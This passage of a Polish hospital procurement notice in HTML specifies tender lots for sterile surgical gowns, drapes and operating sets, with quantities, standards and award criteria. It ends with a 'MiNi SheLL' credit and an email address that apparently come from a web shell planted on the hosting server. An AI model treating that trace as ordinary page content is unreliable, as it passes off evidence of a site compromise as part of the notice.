3. Opakowania jednostkowe  wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia w postaci naklejki do umieszczenia na karcie pacjenta	
4.Podane wymiary są wymiarami minimalnymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 4      Fartuchy chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jednorazowy, pełnobarierowy, sterylny fartuch chirurgiczny zgodny z normą EN 13795 cz.1-3, , wykonany z włókniny min. 3 warstwowej typu SMS o gramaturze 35 g/ m2.  Rękaw zakończony elastycznym mankietem poliestrowym o długości min. 7,5 cm, tylne części fartucha zachodzą na siebie. Umiejsowienie troków w specjalnym kartoniku umożliwiające zawiązanie ich w sposób aseptyczny, z tyłu zapięcie na rzep. Szwy wykonane techniką ultradźwiękową. Bezpośrednio na fartuchu umieszczony nadruk informujący o rozmiarze. Fartuch zawinięty w serwetę z papieru krepowego wraz z dwoma, włókninowymi ściereczkami do rąk. Opakowanie folia-papier, wyposażone w 4 samoprzylepne etykiety typu TAG do archiwizacji danych. Dostępne rozmiary M, L, XL   	SZT	4800
2	Jednorazowy, pełnobarierowy, sterylny fartuch chirurgiczny zgodny z normą EN 13795 cz.1-3, , wykonany z włókniny min. 3 warstwowej typu SMS o gramaturze 35 g/ m2 z przodu  i na rękawach wyposażony w trwale przymocowane nieprzemakalne wstawki z dwuwarstwowego laminatu o gramaturze 38g/m2. Rękaw zakończony elastycznym mankietem poliestrowym o długości min. 7,5 cm, tylne części fartucha zachodzą na siebie. Umiejsowienie troków w specjalnym kartoniku umożliwiajace zawiązanie ich w sposób aseptyczny, z tyłu zapięcie na rzep. Szwy wykonane techniką ultradźwiękową. Bezpośrednio na fartuchu umieszczony nadruk informujący o rozmiarze. Fartuch zawinięty w serwetę z papieru krepowego wraz z dwoma, włókninowymi ściereczkami do rąk. Opakowanie folia-papier, wyposazone w 4 samoprzylepne etykiety typu TAG do archiwizacji danych. Dostępne rozmiary M, L, XL  	SZT	3800
Wymagania	
1. Do każdej pozycji należy dołączyć kartę techniczną produktu wystawioną przez producenta.  Kartę należy opisać numerem pakietu oraz pozycji.	
2. Opakowania jednostkowe  wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia w postaci naklejki do umieszczenia na karcie pacjenta	
3.Podane wymiary są wymiarami minimalnymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 5      Jałowe zestawy obłożeń operacyjnych 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw urologiczny  o składzie

- 1szt serweta nieprzylepna 150  x 90 cm
- 2szt serweta samoprzylepna 150 x 90 cm, przylepiec na całej długości krótszego boku
- 1szt serweta na stół narzędziowy 150 x 90-100 cm (owinięcie zestawu)
- 1szt  ręcznik chłonny
	zest	900
Wymagania	
1. Serwety wykonane z laminatu dwuwarstwowego o gramaturze min 54g/m2 . Materiał musi spełniać wymogi normy EN 13795 cz.1-3.	
2. Do każdej pozycji należy dołączyć kartę techniczną produktu wystawioną przez producenta.  Kartę należy opisać numerem pakietu oraz pozycji.	
3. Opakowania jednostkowe  wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia w postaci naklejki do umieszczenia na karcie pacjenta	
4.Podane wymiary są wymiarami minimalnymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 6      Serwety chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jałowa Serweta -Podkład nieprzylepna o wymiarach 100 x 90 cm	szt.	120
2	Jałowa serweta samoprzylepna o min. wymiarze 90 x 100 cm .	szt.	1100
3	Jałowa serweta samoprzylepna o min. wymiarze 150  x 175 cm .	szt.	250
4	Jałowa serweta z przylepcem o min. wymiarze 100 x 90 cm .	szt.	100
5	Jałowa serweta  samoprzylepna o min . wymiarze  45 x 75 cm regulowanym otworem 6 x 9.	szt.	800
Wymagania														
1. Do każdej pozycji należy dołączyć kartę techniczną produktu wystawioną przez producenta.  Kartę należy opisać numerem pakietu oraz pozycji.														
2. Opakowania jednostkowe  wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia w postaci naklejki do umieszczenia na karcie pacjenta														
3.Podane wymiary są wymiarami minimalnymi														
4. Serwety wykonane z laminatu dwuwarstwowego z absorpcyjną warstwą celulozy na powierzchni i folią na stronie tylnej, o gramaturze min 54g/m2 .  Materiał musi spełniać wymogi normy EN 13795 cz.1-3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr 7      Jałowe zestawy obłożeń operacyjnych 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw serwet jałowych do operacji okulistycznych:                    -1szt. serweta na stolik o wymiarze 100cm x 150cm;    - 1szt. serweta okulistyczna o wym.. 100cm x 100 cm  z otworem z folią operacyjną o wymiarach 10cm x 10cm, dwoma kieszeniami na płyny, sztywnikiem;             - 2szt. serwetka chłonna do rąk o wym. 30cm x 30cm.


	zest	250
Wymagania			
1. Serweta główna, stanowiąca obłożenie pacjenta wykonana z minimum 3 warstwowej włókniny o gramaturze minimalnej 51g/m2, zgodne z normą EN 13795 cz.1-3;			
2. Do każdej pozycji należy dołączyć kartę techniczną produktu wystawioną przez producenta.  Kartę należy opisać numerem pakietu oraz pozycji.			
3. Opakowania jednostkowe  wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia w postaci naklejki do umieszczenia na karcie pacjenta			
4.Podane wymiary są wymiarami minimalnymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 8      Jałowe zestawy obłożeń operacyjnych 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw obłożenia okulistycznego w składzie:  - 1szt serweta na stolik 150x180                        - 1szt serweta na stolik Mayo wzmocniona czerwona 80x140                                        - 1szt serweta okulistyczna 120x170 z otworem z folią operacyjną o wym. 10 cm x 10 cm,
dwoma kieszeniami na płyny, sztywnikiem     - 1szt pokrowiec na tacę Fako 40x65                 - 2szt osłona na podłokietnik 35x75              - 2 szt serwetka chłonna do rąk	zest	200
2	Zestaw do cięcia cesarskiego w składzie:                                                                                                                                         - 1szt serweta na stolik narzędziowy 150 x 190 cm
- 1sztobłożenie stolika Mayo wzmocniona czerwona 80 x 140 cm
- 1szt serweta do cięcia cesarskiego 200x320 z otworem z folią operacyjną o wym. 25 cm x 30 cm, torbą do zbiórki płynów o wym. 75 cm x 85 cm ze sztywnikiem, filtrem, dwoma końcówkami odpływowymi   
- 1szt serweta dla noworodka 75 x 80 cm
- 4szt ręczniki chłonne                                - taśma chirurgiczna przylepna 10x50cm;      dodatkowo w zestawie umieszczone:
- 40szt gazików z gazy 17-to nitkowych, 8 warstwowych, z podwijanymi brzegami  10x10xm                                                       - opatrunek włókninowy z przecięciem O i warstwą chłonną roz. 12x14cm (+/-1cm)                                                      - 5szt serwet gazowych o wym. 45x45 cm (+/-10%), dekatyzowanych, z nitką radiacyjną i tasiemką                                                  - 1szt serweta nieprzylepna 150 x 175-200cm  - 1szt tacka na skalpele                                    - 1szt serweta dwuwarstwowa 150x180cm                          


	zest	550
Wymagania	
1. Dot. pozycji 1,2 - serwety główne, stanowiące obłożenie pacjenta wykonane z minimum 3 warstwowej włókniny o gramaturze minimalnej 51g/m2, zgodne z normą EN 13795 cz.1-3;	
2. Do każdej pozycji należy dołączyć kartę techniczną produktu wystawioną przez producenta.  Kartę należy opisać numerem pakietu oraz pozycji.	
3. Opakowania jednostkowe  wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia w postaci naklejki do umieszczenia na karcie pacjenta	
4.Podane wymiary są wymiarami minimalnymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com